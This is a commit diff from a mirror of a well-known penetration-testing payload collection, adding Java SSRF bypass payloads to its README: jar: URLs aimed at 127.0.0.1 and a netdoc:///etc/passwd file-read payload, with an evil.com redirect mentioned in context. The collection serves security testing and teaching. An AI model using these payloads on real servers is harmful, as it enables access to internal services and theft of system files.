mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-21 14:16:07 +00:00
update SSRF/README.md with java payloads
This commit is contained in:
parent
bd184487e5
commit
08bc3acb05
@ -247,6 +247,15 @@ For example to rotate between 1.2.3.4 and 169.254-169.254, use the following dom
|
|||||||
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
|
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypassing using jar protocol (java only)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
jar:scheme://domain/path!/
|
||||||
|
jar:http://127.0.0.1!/
|
||||||
|
jar:https://127.0.0.1!/
|
||||||
|
jar:ftp://127.0.0.1!/
|
||||||
|
```
|
||||||
|
|
||||||
## SSRF exploitation via URL Scheme
|
## SSRF exploitation via URL Scheme
|
||||||
|
|
||||||
### File
|
### File
|
||||||
@ -374,8 +383,8 @@ Content of evil.com/redirect.php:
|
|||||||
Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
|
Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
ssrf.php?url=gopher://127.0.0.1:4242/DATA
|
ssrf.php?url=netdoc:///etc/passwd
|
||||||
```
|
```
|
||||||
|
|
||||||
## SSRF exploiting WSGI
|
## SSRF exploiting WSGI
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user